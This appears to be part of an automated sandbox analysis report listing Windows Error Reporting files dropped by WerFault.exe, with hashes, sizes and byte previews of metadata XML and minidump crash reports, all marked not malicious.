C:\ProgramData\Microsoft\Windows\WER\Temp\WERA172.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7029530538250373
Encrypted:	false
SSDEEP:	192:R6l7wVeJeIS6+eZR6Y176AomgmfpnpBz89bWvsfdym:R6lXJc6+eZR6YZ6AomgmfpcWUf5
MD5:	A973B32378F696367F0231932E9002E7
SHA1:	A22D75C4024D74416DFAE6531CDEFF0A966AFD87
SHA-256:	3FB38AD1FA902D29D3D1ED98D9292C1CDFF8168E92532EABE893A4A144F12704
SHA-512:	1795A34C4193DB7F887A33C35C88A875893B5B51F8AF8C023F13BC15F666315C03B4EE6B62C3A9D3E011EB791CC0C3423D2B28F725C7184F2BA9D0086AB4E41A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1A2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.482686879716041
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VY2Ym8M4JhmCF6+q8CQF8gTa3d:uIjfNI7aG7VCJhCl08gTa3d
MD5:	FB5504255574EBEF37EFFC9304A180D9
SHA1:	982B097D2D66E0599A9139CC0AF8ED103BB5802E
SHA-256:	9CF5AD14F7C65ECE1A4F8C57B41A4655B8E3535543AAB4AF82EFD14F10931355
SHA-512:	D23EB3E61805671A84C8010F0D38EA62A9AE8DB0F030B64E555557C1D0E139479EF095A36B23187B5F0DA57B71311294766EAF6A8950F13FD928067706D071E9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA52A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:42 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56668
Entropy (8bit):	2.1084975674791466
Encrypted:	false
SSDEEP:	384:6ZVK8zcVc53O40kJK8IzaoQKICp0UsR9ndC:6ZVnz+c53O40LheoQKZp0Umg
MD5:	32AAE28365C1EB99CF00692EB0E8E7AC
SHA1:	0C9812FF06B8CC9EF31A5320E68382894807BBD8
SHA-256:	4CC6D6B3C4800374F1D65BD78F84AD4FDFBAF6B3DF6C82AA79CA4CFBA705C01C
SHA-512:	A3BA9E646D1D1785CAB4473C90ADE8E86B3C830A766C2D932A01B03988A461642F6DE584CDDB2042D237C6110A296E3FEBFD5C7E678E1C88CF287D545CC81ECA
Malicious:	false
Preview:	MDMP..a..... .........f........................................H3..........T.......8...........T...........X...........................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5E6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7025870505230767
Encrypted:	false
SSDEEP:	192:R6l7wVeJeIo6AsU6Y1I6Aomgmf5aAjAopBw89btvsfQIPm:R6lXJm6AsU6Yq6Aomgmf5aAjAStUfQt
MD5:	FD9493847C6D0AB356DCBF75CD009935
SHA1:	F98E23378C4DD66468A5932A4E50FAF399FC38ED
SHA-256:	41026C1F1646A9ED4D8E2E11EC23CBF7C8984E9C955694AD49EC01EF8FFD06A9
SHA-512:	97C5FDBA0DCBD55B6DF2625285441B70C967C6EC874F07E3752644F8162E95625DB650A3B7C9FF220F324596FCCB54A5A38FA21A9EA670ABDA1463D0231C3DE0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA607.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.479254749954751
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VY4Ym8M4JhmaFZ6+q8CoF8gTa3d:uIjfNI7aG7VgJhJ6lc8gTa3d
MD5:	A6EC03E38672ABE120E65C6197E3E1DC
SHA1:	7C5AEFACCC63211EEE3F4AE665B1C744CC25C430
SHA-256:	217F8CE31BFE03F0C880AE87794AB34A894C10BF64B43B7A0ECA82EF43299741
SHA-512:	C4D4A95FCE12B89460780BEC8D85EC019D22E0B71A88363A3AB22BFCE73309E180D20C9DE583E3465D2B518C15CAA16F3EECE4ACAF940985F23C04D7E817154A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA3B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:43 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58124
Entropy (8bit):	2.1246175692675418
Encrypted:	false
SSDEEP:	384:/5ZVK8CU/c5apcdkkbz/ekEQKICp0UUuzwBZIC:/5ZVnCMc5apciWLeTQKZp0UlbC
MD5:	F16C2FCACEA728A6F07DA27B39733C05
SHA1:	7E8CDBC0418F87071E108739DA6318102D9EF9D6
SHA-256:	43A49CDE0308B32F6E505A240BB5D03FBDFFC0A31BC9745F51A159C54C3291D4
SHA-512:	28D81E2A0E53539E81AD66C4E461DC4695975E52A49D88B01EB2BCDA2E6D2AA92C24E2EC9B3BBCA7BD1A0791E205471EF13EA7EADD2CB074A03B22BB8B25909E
Malicious:	false
Preview:	MDMP..a..... .........f........................................H3..........T.......8...........T.......................................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAD8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.703492639377471
Encrypted:	false
SSDEEP:	192:R6l7wVeJeId6fSA6Y1I6AomgmfpnpBO89bkvsf1Mm:R6lXJD6fSA6Yq6AomgmfpvkUfb
MD5:	38F8AE42FD004A146A9C69079DD017B4
SHA1:	2FADBABB1E0033F769F5D27BA0EA177809E5C8BA
SHA-256:	88851D7DD844C41193A494760FB652B1991D2BD766A87FF15233CC1EF12FE9ED
SHA-512:	6407EE1BA94DA888D1DE346E5855364DDE661189230572A40CACB383DEB5B637350AE49FEB3258022195C5BE18D7BE5DE5FBBE7E103517C83E1C76C2C2C7821A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB37.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.4832614745647525
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYCPYm8M4JhmCF8+q8CQF8gTa3d:uIjfNI7aG7VnSJhEl08gTa3d
MD5:	094E23AE9A1E151E355799B723548A67
SHA1:	6DC202EDE3EFCF0AC33D6507AE45F2243392942D
SHA-256:	6769D480D864CDD33562A9411DB3AA1A16A229A0131E2F0574CB361F1FD6E784
SHA-512:	D0DC8B6C843C7423AD6C4FFE2ECD5AA6E8CF2A748B465A7286B746D6148D258C3E782C10DE58107B45738FA9FFBD7CE97199B405D4CBC6E80C6110E7AE9F64CE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFD8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:45 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56746
Entropy (8bit):	2.10948238640565
Encrypted:	false
SSDEEP:	384:hZVK85hc5A6a0FJa8Izq4QKICp0UYFSl7Dg:hZVn5hc5A6a0WhG4QKZp0UjXg
MD5:	F28B4D501355AA3E2A05446B8E2FAB46
SHA1:	2182F40A29DAF847651E83B67AD65E6D958073F1
SHA-256:	0845000EE2D97F19DC1C840895E9E8E8AF3F3C25DA591CBFBC358910CAA37987
SHA-512:	97D54E588614306232E7DC2B0B947E3DE9DBFC1B31AEF2E88F214A530F93791100C6E01D40023D52078A29C075F8FEB1EBE6836EF0F6AFD7290E139A58B29EA3
Malicious:	false
Preview:	MDMP..a..... .........f........................................H3..........T.......8...........T...............*.......................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB075.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7009644361327827
Encrypted:	false
SSDEEP:	192:R6l7wVeJeIc6ASg6Y1nB6Aomgmf5aAjAopBa89byvsf6mm:R6lXJC6ASg6Y9B6Aomgmf5aAjA8yUfS
MD5:	1DCDF5A05421A45604E20BFBBD2935ED
SHA1:	D32E2DF927C75699E73E30739030CEDC51209F01
SHA-256:	CCEABD25E145D940D4A9DCE1B6E4B8F62684D7D265933F8410D8D7CEFBD176AB
SHA-512:	1A8A28E6F56895814FF7D76FF76815008AA189992451F2F28903B216074955D89C05D5B9EB26BECD91DF8621EF5C37CC768B446B54B336E4C8853BB85388EB10
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB096.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.478547100664001
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYrYm8M4JhmaFu5+q8CoF8gTa3d:uIjfNI7aG7V7Jhylc8gTa3d
MD5:	C0A691C677596A80AFFCE41434A11316
SHA1:	69765ACF27616FA25F983D6D06447783401EA55B
SHA-256:	5DC6A402BCB36592CAB4F1D71F4B2E33776D85B23174CCC30AEDA34A9C5E6643
SHA-512:	FD0C64B3B629C76E22360D7BE37968E280C4573D4E6EC49B0E014812D44ACFD338928540C16523B8F1CD1FFF34E4D598CD2E119213722C3A6C93C096F265FBD2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB41E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:46 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58202
Entropy (8bit):	2.121096424750717
Encrypted:	false
SSDEEP:	384:gZVK8pdc5OBx5rcd0k3zi6kRQKICp0Urb+o4mWN:gZVnpdc5kTrcKW26OQKZp0Uuo4rN
MD5:	228A6C0EFF0AB3E7E85886DDEF1D1969
SHA1:	A141381033978F4F632778CADC8FD1C80299E042
SHA-256:	84F91FEE5D1B1A3F581B818D8C63A866DF58FA0A94F07328EE43998826A77C9F
SHA-512:	6A8659FC8CCD7A41C53BD086DE3CFA5B11E61CAC510051B75191401FBC8167CB331C34F2DB39FB1E96F8E78D7EDEC315C467B32199CC3B4E86E8A75ACFBF7DEE
Malicious:	false
Preview:	MDMP..a..... .........f........................................H3..........T.......8...........T........... ...:.......................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4CB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.703314472473815
Encrypted:	false
SSDEEP:	192:R6l7wVeJeIj6V0D6Y1x6AomgmfpnpBa89bJvsf3Dm:R6lXJ96V0D6Yz6AomgmfpbJUfq
MD5:	B75FF9AF93D0EA0877D9A07FE93FE5A2
SHA1:	AEC4DCF6D8CA033F847FD23C7C05BBB7152D4487
SHA-256:	B6D6550DB9326BD3F8D7611A7AA134CCE7F4CBD74CB7BECA0DFE9350A67770DE
SHA-512:	9FF3CA657434009144D3DD9BF1ACFB9ED0EA1C7E3B3A572CAF6775B7013A5A96A1DA1AB9CF236C69C9DD014BDEB7278B0AC590BE13FDD259AD904612C520A958
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4EB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.482823420952881
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYEoYm8M4JhmCFAE0+q8CQF8gTa3d:uIjfNI7aG7VtJhQl08gTa3d
MD5:	2D203D86BB319C7844598E675F17C53A
SHA1:	A58CDA9A7E5A501603518D50004BC1CFE8BFBB91
SHA-256:	1D37F8A90D7B0B27764A9A8EE3A8AB9F113925D81ED77B5F1B6B0C5EB0749A46
SHA-512:	6E362677635B94FF73B7A25DB5959569D250E6C5A765FB4BC750700CD5F4C125DE0043EA7DC59FBC7D206740DF7F214934B2C7FB1799C9BD389BB1FA7E83A4E1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA96.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56844
Entropy (8bit):	2.1101338294597114
Encrypted:	false
SSDEEP:	384:VZVK8pFac5F6vKrIJa8IzVWQKICp0UYJ9vrUkLS:VZVnpFac5F6irfhhWQKZp0UyrPS
MD5:	569BC0CEF63157150AB042C8B5579081
SHA1:	4065A45DBFBDEDB4E641C0200B3E1F92DCD113C3
SHA-256:	07F258CEF6A2F494ECFFF634891813A9BFAF693B3EE34954C11252D32278ED16
SHA-512:	1133282BAE6AE96F76D477C550653704469939D49533D6EE53564FC150C78847243453B2235638D95A1E3D0680F767D528339D7DCC2243E2261834FA1AD1949B
Malicious:	false
Preview:	MDMP..a..... .........f........................................H3..........T.......8...........T...............d.......................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBCF9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7019044155116
Encrypted:	false
SSDEEP:	192:R6l7wVeJeIR6q006Y1Go6Aomgmf5aAjAopBt89bXvsffjdm:R6lXJv6q006YT6Aomgmf5aAjA1XUffE
MD5:	6A50437FAC9AE5CE141EBB2C578547F2
